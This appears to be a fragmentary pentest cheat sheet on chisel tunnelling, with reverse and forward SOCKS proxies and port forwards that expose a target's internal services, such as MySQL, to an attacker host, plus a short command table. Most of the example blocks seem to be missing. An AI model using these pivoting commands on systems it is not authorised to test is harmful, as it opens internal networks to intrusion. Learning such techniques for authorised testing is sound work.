Download
Reverse SOCKS Proxy
Attacker (Server)
Target (Client)
127.0.0.1:1080.
Use with ProxyChains
Forward SOCKS Proxy
Target (Server)
Attacker (Client)
Port Forwarding
Remote Port Forward
Expose internal service to attacker.http://127.0.0.1:8888 on attacker → reaches INTERNAL_IP:80.
Local Port Forward
127.0.0.1:9999 on attacker → reaches target’s local MySQL.
Multiple Tunnels
Double Pivot
Quick Reference
| Task | Command |
|---|---|
| Reverse SOCKS | Server: chisel server -p 8000 --reverse / Client: chisel client IP:8000 R:socks |
| Port forward | Client: chisel client IP:8000 R:LOCAL:REMOTE_IP:REMOTE_PORT |
| SOCKS port | Default 127.0.0.1:1080 |